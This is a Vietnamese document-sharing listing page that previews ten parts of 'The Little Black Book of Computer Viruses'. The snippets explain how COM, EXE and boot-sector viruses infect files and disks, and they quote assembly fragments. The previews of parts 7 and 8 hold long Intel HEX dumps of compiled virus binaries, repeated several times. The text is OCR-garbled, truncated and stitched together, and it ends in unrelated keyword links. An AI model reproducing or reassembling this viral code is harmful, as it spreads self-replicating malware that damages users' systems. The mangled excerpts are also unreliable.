0
  1. Trang chủ >
  2. Công Nghệ Thông Tin >
  3. An ninh - Bảo mật >

The Little Black Book of Computer Viruses phần 3 docx

The Little Black Book of Computer Viruses phần 3 docx

The Little Black Book of Computer Viruses phần 3 docx

... FoundYesNo 34 The Little Black Book of Computer Viruses cx:dx is used as the offset from the end of the file. Since the firstthing the virus must do is place its code at the end of the COM fileit ... determinewhether its first instruction is a jump. If it isn’t, then the virusobviously has not infected that file yet. There are two kinds of jump 36 The Little Black Book of Computer Viruses the relocatability ... [HANDLE]44 The Little Black Book of Computer Viruses Now, with the main body of viral code appended to the end of the COM file under attack, the virus must do some clean-upwork. First, it must move the...
  • 18
  • 338
  • 0
The Little Black Book of Computer Viruses phần 9 docx

The Little Black Book of Computer Viruses phần 9 docx

... and then run PUT _36 0 in the same directory asSTEALTH.COM. The program disk has PUT programs for otherformats, or you can modify PUT _36 0 to do it.151 The Little Black Book of Computer Viruses Appendix ... 255) 31 0 H$=LEFT$(S$,9) 32 0 H$=RIGHT$(H$,2) 33 0 IF H$<>"00" THEN GOTO 160 34 0 FOR J%=1 TO COUNT% 35 0 H$=LEFT$(S$,9+2*J%) 36 0 H$=RIGHT$(H$,2) 37 0 GOSUB 500 38 0 CSUM%=CSUM%+X% 39 0 ... pop ax mov ss:[bp+20],ax 139 The Little Black Book of Computer Viruses ;to infect the drive. It has no safeguards to prevent infecting an already;infected disk. the routine CHECK_DISK must...
  • 18
  • 297
  • 0
The Little Black Book of Computer Viruses phần 1 pot

The Little Black Book of Computer Viruses phần 1 pot

... sort? Per-haps they are the electronic analog of the simplest one-celled8 The Little Black Book of Computer Viruses The Little Black Book of Computer Viruses Volume One: The Basic TechnologyBy ... protected.4 The Little Black Book of Computer Viruses day to day computing. Many people think of viruses as sort of a black art. The purpose of this volume is to bring them out of the closet and ... has to put the program on11 The Little Black Book of Computer Viruses The Basics of the Computer VirusA plethora of negative magazine articles and books havecatalyzed a new kind of hypochondria...
  • 19
  • 301
  • 0
The Little Black Book of Computer Viruses phần 2 pptx

The Little Black Book of Computer Viruses phần 2 pptx

... FileImagePSPcs=ds=es=ssipsp0H100HFFFFHFigure 3: Memory map just before executing a COM file.26 The Little Black Book of Computer Viruses essors. In the CP/M world, 64 kilobytes was all the memory a computer had. The lowest 256 bytes of ... this 13 The Little Black Book of Computer Viruses computer locks up, with everything on it ruined, most anyone canfigure out that they’ve been the victim of a destructive program.And if they’re ... when they are correctly written. Which-ever assembler you decide to use, though, the viruses in this book 19 The Little Black Book of Computer Viruses use to a DOS programmer today. Some of it...
  • 18
  • 399
  • 0
The Little Black Book of Computer Viruses phần 4 potx

The Little Black Book of Computer Viruses phần 4 potx

... completion of the program.Any other value indicates some kind of error, as determined by the 50 The Little Black Book of Computer Viruses program making the DOS call. So, the simplest COM programwould ... risk! It’s not like any other computer program you’ve ever run!52 The Little Black Book of Computer Viruses infecting every EXE file on the system. To do that we make use of the typical PC user’s ... before INFECT, the SHOULDRUN routine becomesSHOULDRUN: xor ah,ahSR1: nop int 1AH and al, 63 ret64 The Little Black Book of Computer Viruses Next, move the first five bytes of the original...
  • 18
  • 254
  • 0
The Little Black Book of Computer Viruses phần 5 pptx

The Little Black Book of Computer Viruses phần 5 pptx

... + [ (32 *ROOT_ENTRIES) + SEC_SIZE - 1]/SEC_SIZEand the size of the file in sectors. The file size in bytes is stored at the offset 1CH from the start of the directory entry at 0000:0500H. The ... 0000:7C00H. If the BIOS doesn’t find adisk in drive A:, it looks for the hard disk drive C:, and tries to load68 The Little Black Book of Computer Viruses Name Position Size DescriptionDOS_ID 7C 03 8 ... point to it. Then it resets the disk drive through BIOSinterrupt 13H, function 0, using the new parameter table. The next step, locating the system files, is done by finding the start of the root...
  • 18
  • 391
  • 0
The Little Black Book of Computer Viruses phần 6 pps

The Little Black Book of Computer Viruses phần 6 pps

... DOS92 The Little Black Book of Computer Viruses VIRUS_START: call GET_START ;get start address;This is a trick to determine the location of the start of the program. We put ;the address of GET_START ... point of view) if it infects the diskette even when the diskis full, and it will have to overwrite a file to infect the disk84 The Little Black Book of Computer Viruses first 30 bytes of code ... to the start of host program mov dx,cx ;so we can put the jump to the virus in mov bx,WORD PTR [HANDLE] mov ax,4200H ;locate file pointer function98 The Little Black Book of Computer Viruses DOS...
  • 18
  • 318
  • 0
The Little Black Book of Computer Viruses phần 7 pot

The Little Black Book of Computer Viruses phần 7 pot

... Viruses :10049000A2AF00FEC0A2FD00E80100C3E85100 735 6:1004A0004C803EFD0000743FFE0EFD00BFAF00BE5D:1004B000AA00E8BB004757E8760075 235 F32C0AA60:1004C000BFAF00BB4F00A0FD00B22BF6E203D88BFC:1004D000F3E89C0057E8C4FF7412E8760074DDFE70:1004E00006FD005F32C0AAB0010AC0C35F32C0C3BC:1004F000BA0600B41ACD21BFAF00BEA300E8700059:1005000057BAAF00B93F00B44ECD210AC075195F8C:1005100047AABFAF00BE2400E855004F57E8 630 06C:10052000 730 CB44FCD21EBE35FC60500F9C35FC385:100 530 00E 831 0052B41ACD21BAAF00B91000B44E60:10054000CD215B0AC0751CF64715107406807F1E0E:100550002E750EE80E0052B41ACD21B44FCD21EB0A:10056000E 132 C0C3BA3100B02BF626FD0003D0C380:10057000268A05470AC075F84F57FCACAA0AC07511:10058000F95FC3E8 230 0720DE80B007208E 833 003E:100590007203E84500C3B04DB45A3B0687007402AD:1005A000F9C 333 C02B06A100C3BAAF00B8023DCDDA:1005B00021720FA3FE008BD8B91C00BA8700B43F8C:1005C000CD21C3A18F0003C003C02B068D0003C0 43 :1005D00003C02B069F003D0800C3A19D00 030 68FAA:1005E00000BA1000F7E28BCA8BD08B1EFE00B80059:1005F00042CD21B43F8B1EFE00BA0901B90200CDE5:1006000021720BA109013B060000F87501F9C3A096:100610000501240F7419B910002AC8BA2705010E64:100620000501 831 60701008B1EFE00B440CD21C3D7:100 630 008B0E07018B1605018B1EFE00B80042CD04:1006400021E8CBFFB9270 533 D28B1EFE00B440CD85:10065000218B1605018B0E0701BB 330 1 430 3D3BB6E:10066000000013CB8B1EFE00B80042CD21BA9500CE:100670008B1EFE00B90200B440CD218B1605018B04:100680000E0701BB3901 430 3D3BB000013CB8B1E04:10069000FE00B80042CD21BA97008B1EFE00B902C1:1006A00000B440CD218B1605018B0E0701BB45011F:1006B00083C30103D3BB000013CB8B1EFE00B80025:1006C00042CD21BA9B008B1EFE00B90400B440CD80:1006D0002 133 C 933 D28B1EFE00B80042CD21A105C3:1006E00001B104D3E88B1E070180E30FB104D2E30C:1006F00002E32B068F00A39D00BB270583C310B127:1007000004D3EB03C3A39500B80C01A39B00B8006E:1007100001A397008B160701A10501BB270503C3A1:1007200 033 DB13D305000213D350B109D3E8B1076B:100 730 00D3E203C2A38B005825FF01A38900B802AE:100740000001068D00B91C00BA87008B1EFE00B4A4:1007500040CD21A18D004848BB0400F7E3 030 69F6C:1007600000BB000013D38BCA8BD08B1EFE00B800D9:1007700042CD21A19D00BB 330 1 438 91E8700A3897F:1007800000A19D00BB450183C3 038 91E8B00A38D7F:1007900000B90800BA87008B1EFE00B440CD21C30B:1007A00 032 E4C3CD1A80E200C3B090A28204C3B485:1007B0002FCD21891E02008CC0A304008CC88EC0DE:1007C000BA0600B41ACD21C38B160200A104008E14Appendix ... Viruses :10049000A2AF00FEC0A2FD00E80100C3E85100 735 6:1004A0004C803EFD0000743FFE0EFD00BFAF00BE5D:1004B000AA00E8BB004757E8760075 235 F32C0AA60:1004C000BFAF00BB4F00A0FD00B22BF6E203D88BFC:1004D000F3E89C0057E8C4FF7412E8760074DDFE70:1004E00006FD005F32C0AAB0010AC0C35F32C0C3BC:1004F000BA0600B41ACD21BFAF00BEA300E8700059:1005000057BAAF00B93F00B44ECD210AC075195F8C:1005100047AABFAF00BE2400E855004F57E8 630 06C:10052000 730 CB44FCD21EBE35FC60500F9C35FC385:100 530 00E 831 0052B41ACD21BAAF00B91000B44E60:10054000CD215B0AC0751CF64715107406807F1E0E:100550002E750EE80E0052B41ACD21B44FCD21EB0A:10056000E 132 C0C3BA3100B02BF626FD0003D0C380:10057000268A05470AC075F84F57FCACAA0AC07511:10058000F95FC3E8 230 0720DE80B007208E 833 003E:100590007203E84500C3B04DB45A3B0687007402AD:1005A000F9C 333 C02B06A100C3BAAF00B8023DCDDA:1005B00021720FA3FE008BD8B91C00BA8700B43F8C:1005C000CD21C3A18F0003C003C02B068D0003C0 43 :1005D00003C02B069F003D0800C3A19D00 030 68FAA:1005E00000BA1000F7E28BCA8BD08B1EFE00B80059:1005F00042CD21B43F8B1EFE00BA0901B90200CDE5:1006000021720BA109013B060000F87501F9C3A096:100610000501240F7419B910002AC8BA2705010E64:100620000501 831 60701008B1EFE00B440CD21C3D7:100 630 008B0E07018B1605018B1EFE00B80042CD04:1006400021E8CBFFB9270 533 D28B1EFE00B440CD85:10065000218B1605018B0E0701BB 330 1 430 3D3BB6E:10066000000013CB8B1EFE00B80042CD21BA9500CE:100670008B1EFE00B90200B440CD218B1605018B04:100680000E0701BB3901 430 3D3BB000013CB8B1E04:10069000FE00B80042CD21BA97008B1EFE00B902C1:1006A00000B440CD218B1605018B0E0701BB45011F:1006B00083C30103D3BB000013CB8B1EFE00B80025:1006C00042CD21BA9B008B1EFE00B90400B440CD80:1006D0002 133 C 933 D28B1EFE00B80042CD21A105C3:1006E00001B104D3E88B1E070180E30FB104D2E30C:1006F00002E32B068F00A39D00BB270583C310B127:1007000004D3EB03C3A39500B80C01A39B00B8006E:1007100001A397008B160701A10501BB270503C3A1:1007200 033 DB13D305000213D350B109D3E8B1076B:100 730 00D3E203C2A38B005825FF01A38900B802AE:100740000001068D00B91C00BA87008B1EFE00B4A4:1007500040CD21A18D004848BB0400F7E3 030 69F6C:1007600000BB000013D38BCA8BD08B1EFE00B800D9:1007700042CD21A19D00BB 330 1 438 91E8700A3897F:1007800000A19D00BB450183C3 038 91E8B00A38D7F:1007900000B90800BA87008B1EFE00B440CD21C30B:1007A00 032 E4C3CD1A80E200C3B090A28204C3B485:1007B0002FCD21891E02008CC0A304008CC88EC0DE:1007C000BA0600B41ACD21C38B160200A104008E14Appendix ... Viruses :10049000A2AF00FEC0A2FD00E80100C3E85100 735 6:1004A0004C803EFD0000743FFE0EFD00BFAF00BE5D:1004B000AA00E8BB004757E8760075 235 F32C0AA60:1004C000BFAF00BB4F00A0FD00B22BF6E203D88BFC:1004D000F3E89C0057E8C4FF7412E8760074DDFE70:1004E00006FD005F32C0AAB0010AC0C35F32C0C3BC:1004F000BA0600B41ACD21BFAF00BEA300E8700059:1005000057BAAF00B93F00B44ECD210AC075195F8C:1005100047AABFAF00BE2400E855004F57E8 630 06C:10052000 730 CB44FCD21EBE35FC60500F9C35FC385:100 530 00E 831 0052B41ACD21BAAF00B91000B44E60:10054000CD215B0AC0751CF64715107406807F1E0E:100550002E750EE80E0052B41ACD21B44FCD21EB0A:10056000E 132 C0C3BA3100B02BF626FD0003D0C380:10057000268A05470AC075F84F57FCACAA0AC07511:10058000F95FC3E8 230 0720DE80B007208E 833 003E:100590007203E84500C3B04DB45A3B0687007402AD:1005A000F9C 333 C02B06A100C3BAAF00B8023DCDDA:1005B00021720FA3FE008BD8B91C00BA8700B43F8C:1005C000CD21C3A18F0003C003C02B068D0003C0 43 :1005D00003C02B069F003D0800C3A19D00 030 68FAA:1005E00000BA1000F7E28BCA8BD08B1EFE00B80059:1005F00042CD21B43F8B1EFE00BA0901B90200CDE5:1006000021720BA109013B060000F87501F9C3A096:100610000501240F7419B910002AC8BA2705010E64:100620000501 831 60701008B1EFE00B440CD21C3D7:100 630 008B0E07018B1605018B1EFE00B80042CD04:1006400021E8CBFFB9270 533 D28B1EFE00B440CD85:10065000218B1605018B0E0701BB 330 1 430 3D3BB6E:10066000000013CB8B1EFE00B80042CD21BA9500CE:100670008B1EFE00B90200B440CD218B1605018B04:100680000E0701BB3901 430 3D3BB000013CB8B1E04:10069000FE00B80042CD21BA97008B1EFE00B902C1:1006A00000B440CD218B1605018B0E0701BB45011F:1006B00083C30103D3BB000013CB8B1EFE00B80025:1006C00042CD21BA9B008B1EFE00B90400B440CD80:1006D0002 133 C 933 D28B1EFE00B80042CD21A105C3:1006E00001B104D3E88B1E070180E30FB104D2E30C:1006F00002E32B068F00A39D00BB270583C310B127:1007000004D3EB03C3A39500B80C01A39B00B8006E:1007100001A397008B160701A10501BB270503C3A1:1007200 033 DB13D305000213D350B109D3E8B1076B:100 730 00D3E203C2A38B005825FF01A38900B802AE:100740000001068D00B91C00BA87008B1EFE00B4A4:1007500040CD21A18D004848BB0400F7E3 030 69F6C:1007600000BB000013D38BCA8BD08B1EFE00B800D9:1007700042CD21A19D00BB 330 1 438 91E8700A3897F:1007800000A19D00BB450183C3 038 91E8B00A38D7F:1007900000B90800BA87008B1EFE00B440CD21C30B:1007A00 032 E4C3CD1A80E200C3B090A28204C3B485:1007B0002FCD21891E02008CC0A304008CC88EC0DE:1007C000BA0600B41ACD21C38B160200A104008E14Appendix...
  • 18
  • 332
  • 0
The Little Black Book of Computer Viruses phần 8 potx

The Little Black Book of Computer Viruses phần 8 potx

... AT YOUR OWN RISK!!129 The Little Black Book of Computer Viruses :1001500016FD7D5BB870005 033 C050CB33D2F 736 FC:10016000187CFEC28AEA33D2F 736 1A7C8816297CBC:100170008BD0C3B402B106D2E60AF58BCA86E98AEF:1001800016FD7D8A36297CCD 137 2FEC3BE1E7CBF50:100190001E05B9DF01F3A4BE007CBF0005B90B004A:1001A000F3A4C3BEC87DB40EAC0AC07404CD10EB7A:1001B000F5C349424D42494F2020 434 F4D494F20FE:1001C0002020202020 535 9 534 B696C726F7920777F:1001D00061 732 068657265210D0A0A000000000045:1001E000000000000000000000000000000000000F:1001F000000000000000000000000000000055AA00:00000001FFTo ... Viruses :1072E000722950BF 037 CBE 037 AB91900F3A5C60604:1072F00 035 7C0158E8AF017212BB00708AD0B6012C:10 730 000B90A4FB805 039 CFF1E0070C38AD0B904A8:10 731 00000B600E805018BD8726DBF2C7A8B050B87:10 732 00045020B45047560B8F77FABB8FFF7ABB8 03 :10 733 0000F00AB8BC3B904008AD3B600E8EA007 231 :10 734 000468AD0B90700B600E8DE0072F4E83F01D3:10 735 0007 235 8AD0B601B9094FE8CD00722950BF05:10 736 000 037 CBE 037 AB91900F3A5C60 635 7C025822:10 737 000E 833 017212BB00708AD0B601B9044FB86D:10 738 00005 039 CFF1E0070C38AD0B90A00B600E84E:10 739 00089008BD872F1BFA87A8B0525F0FF0B45C9:1073A000020B45040B45060B4508756E268B05251B:1073B0000F000570FFABB8F77FABB8FFF7ABB87F36:1073C000FFABB8F70FAB8BC3B90A008AD3B600E89E:1073D000570072468AD0B90100B601E84B0072F43A:1073E000E8AC007 235 8AD0B601B9124FE83A0072A3:1073F0002950BF 037 CBE 037 AB91900F3A5C60 635 30:107400007C 035 8E8A0007212BB00708AD0B601B9A4:107410000D4FB805 039 CFF1E0070C350BB007AB827:1074200001029CFF1E007058C350BB007AB80103D4:107 430 009CFF1E007058C3B080A 235 7CE85000BB92:10744000007A508AD0B600B90700B801 039 CFF1E2D:1074500000705850BF 037 CBE 037 AB91900F3A5BF72:10746000BE7DBEBE7BB92100F3A558E 838 00BB0045:10747000708AD0B600B90200B805 039 CFF1E0070E8:10748000C31E33C08ED8BB75048A071F3C00C3508F:10749000BB007A8AD0B600B500B101B001B4029C3D:1074A000FF1E007058C350BB007C8AD0B600B500E8:1074B000B101B001B4 039 CFF1E007058C35657FCC5:1074C000BF367CBE367AB90F00F3A75F5EC30000FB:107B0000EB349000000000000000000000000000C6:107B3000000000000000FA33C08ED08ED88EC0BC8A:107B4000007CFBB106A1 130 4D3E02DE0078EC083B7:107B50002E 130 404BE007C8BFEB90001F3A506B809:107B6000647C50CB061F90BB0070A 035 7C3C007 439 :107B7000153C0174173C0274193C 037 41BBA800055:107B8000B500B102EB19B527B104EB10B54FB10A3E:107B9000EB0AB54FB104EB04B54FB10DBA0001B8 13 :107BA0000602CD 137 2F 933 C08EC0BE007ABF007CCE:107BB000B90001F3A5FA8CC88ED0BC00700E0 733 53 :107BC000C08ED8BE4C00BF0070A5A5B80470BB4CD9:107BD0000089078CC0894702FB0E1F803E357C80E0:107BE0007412E89CF8740DB080E8A3F8E8CEF8743D:107BF00003E843F8BEBE7DBFBF7DB93F00C60400A9:107C0000F3A 433 C050B8007C50CB0000000000004B:107CF000000000000000000000000000000055AA85:00000001FFAppendix ... Viruses :1072E000722950BF 037 CBE 037 AB91900F3A5C60604:1072F00 035 7C0158E8AF017212BB00708AD0B6012C:10 730 000B90A4FB805 039 CFF1E0070C38AD0B904A8:10 731 00000B600E805018BD8726DBF2C7A8B050B87:10 732 00045020B45047560B8F77FABB8FFF7ABB8 03 :10 733 0000F00AB8BC3B904008AD3B600E8EA007 231 :10 734 000468AD0B90700B600E8DE0072F4E83F01D3:10 735 0007 235 8AD0B601B9094FE8CD00722950BF05:10 736 000 037 CBE 037 AB91900F3A5C60 635 7C025822:10 737 000E 833 017212BB00708AD0B601B9044FB86D:10 738 00005 039 CFF1E0070C38AD0B90A00B600E84E:10 739 00089008BD872F1BFA87A8B0525F0FF0B45C9:1073A000020B45040B45060B4508756E268B05251B:1073B0000F000570FFABB8F77FABB8FFF7ABB87F36:1073C000FFABB8F70FAB8BC3B90A008AD3B600E89E:1073D000570072468AD0B90100B601E84B0072F43A:1073E000E8AC007 235 8AD0B601B9124FE83A0072A3:1073F0002950BF 037 CBE 037 AB91900F3A5C60 635 30:107400007C 035 8E8A0007212BB00708AD0B601B9A4:107410000D4FB805 039 CFF1E0070C350BB007AB827:1074200001029CFF1E007058C350BB007AB80103D4:107 430 009CFF1E007058C3B080A 235 7CE85000BB92:10744000007A508AD0B600B90700B801 039 CFF1E2D:1074500000705850BF 037 CBE 037 AB91900F3A5BF72:10746000BE7DBEBE7BB92100F3A558E 838 00BB0045:10747000708AD0B600B90200B805 039 CFF1E0070E8:10748000C31E33C08ED8BB75048A071F3C00C3508F:10749000BB007A8AD0B600B500B101B001B4029C3D:1074A000FF1E007058C350BB007C8AD0B600B500E8:1074B000B101B001B4 039 CFF1E007058C35657FCC5:1074C000BF367CBE367AB90F00F3A75F5EC30000FB:107B0000EB349000000000000000000000000000C6:107B3000000000000000FA33C08ED08ED88EC0BC8A:107B4000007CFBB106A1 130 4D3E02DE0078EC083B7:107B50002E 130 404BE007C8BFEB90001F3A506B809:107B6000647C50CB061F90BB0070A 035 7C3C007 439 :107B7000153C0174173C0274193C 037 41BBA800055:107B8000B500B102EB19B527B104EB10B54FB10A3E:107B9000EB0AB54FB104EB04B54FB10DBA0001B8 13 :107BA0000602CD 137 2F 933 C08EC0BE007ABF007CCE:107BB000B90001F3A5FA8CC88ED0BC00700E0 733 53 :107BC000C08ED8BE4C00BF0070A5A5B80470BB4CD9:107BD0000089078CC0894702FB0E1F803E357C80E0:107BE0007412E89CF8740DB080E8A3F8E8CEF8743D:107BF00003E843F8BEBE7DBFBF7DB93F00C60400A9:107C0000F3A 433 C050B8007C50CB0000000000004B:107CF000000000000000000000000000000055AA85:00000001FFAppendix...
  • 18
  • 291
  • 0
The Little Black Book of Computer Viruses phần 10 potx

The Little Black Book of Computer Viruses phần 10 potx

... for the serious virus designer.John Crawford, Patrick Gelsinger, Programming the 8 038 6 (Sybex, SanFransisco) 1987, ISBN 0-89588 -38 1 -3. Similar to the above, for the 8 038 6.166 The Little Black ... function sets the Disk Transfer Area (DTA) address to the value givenin ds:dx. It is meaningful only within the context of a given program.158 The Little Black Book of Computer Viruses telling?” ... from the system clock date and timewhen a file is created or modified, but the programmer can use this functionto modify the date/time at will. 164 The Little Black Book of Computer Viruses The...
  • 20
  • 291
  • 0

Xem thêm

Từ khóa: the structure and implementation of computer programsthe two main types of computer networksthe structure and interpretation of computer programs bookthe contented little baby book of weaning gina fordthe creation of computer virusesBáo cáo thực tập tại nhà thuốc tại Thành phố Hồ Chí Minh năm 2018chuyên đề điện xoay chiều theo dạngNghiên cứu sự hình thành lớp bảo vệ và khả năng chống ăn mòn của thép bền thời tiết trong điều kiện khí hậu nhiệt đới việt namđề thi thử THPTQG 2019 toán THPT chuyên thái bình lần 2 có lời giảiGiáo án Sinh học 11 bài 13: Thực hành phát hiện diệp lục và carôtenôitGiáo án Sinh học 11 bài 13: Thực hành phát hiện diệp lục và carôtenôitGiáo án Sinh học 11 bài 13: Thực hành phát hiện diệp lục và carôtenôitGiáo án Sinh học 11 bài 13: Thực hành phát hiện diệp lục và carôtenôitĐỒ ÁN NGHIÊN CỨU CÔNG NGHỆ KẾT NỐI VÔ TUYẾN CỰ LY XA, CÔNG SUẤT THẤP LPWANĐỒ ÁN NGHIÊN CỨU CÔNG NGHỆ KẾT NỐI VÔ TUYẾN CỰ LY XA, CÔNG SUẤT THẤP LPWANNGHIÊN CỨU CÔNG NGHỆ KẾT NỐI VÔ TUYẾN CỰ LY XA, CÔNG SUẤT THẤP LPWAN SLIDEQuản lý hoạt động học tập của học sinh theo hướng phát triển kỹ năng học tập hợp tác tại các trường phổ thông dân tộc bán trú huyện ba chẽ, tỉnh quảng ninhPhát triển mạng lưới kinh doanh nước sạch tại công ty TNHH một thành viên kinh doanh nước sạch quảng ninhTrả hồ sơ điều tra bổ sung đối với các tội xâm phạm sở hữu có tính chất chiếm đoạt theo pháp luật Tố tụng hình sự Việt Nam từ thực tiễn thành phố Hồ Chí Minh (Luận văn thạc sĩ)Nghiên cứu, xây dựng phần mềm smartscan và ứng dụng trong bảo vệ mạng máy tính chuyên dùngGiáo án Sinh học 11 bài 14: Thực hành phát hiện hô hấp ở thực vậtGiáo án Sinh học 11 bài 14: Thực hành phát hiện hô hấp ở thực vậtĐổi mới quản lý tài chính trong hoạt động khoa học xã hội trường hợp viện hàn lâm khoa học xã hội việt namMÔN TRUYỀN THÔNG MARKETING TÍCH HỢPTÁI CHẾ NHỰA VÀ QUẢN LÝ CHẤT THẢI Ở HOA KỲ